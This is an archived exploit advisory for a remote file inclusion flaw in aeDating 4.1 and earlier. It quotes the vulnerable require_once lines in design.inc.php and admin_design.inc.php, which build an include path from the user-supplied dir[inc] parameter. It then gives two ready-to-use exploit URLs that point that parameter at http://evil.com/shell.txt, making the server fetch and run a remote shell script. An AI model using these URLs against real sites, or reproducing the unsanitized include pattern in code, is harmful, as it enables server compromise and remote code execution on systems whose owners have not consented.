id: 843
date: 09/15/2006
title: aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities
author: NeXtMaN
cves: 

============================================================
aeDating <= 4.1 dir[inc] Remote File Include Vulnerabilities
============================================================



AEDating (all versions) Remote File inclusion.

Vulnerable code:

/inc/design.inc.php
/inc/admin_design.inc.php

require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );

Exploit:
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?



#  0day.today [2023-03-23]  #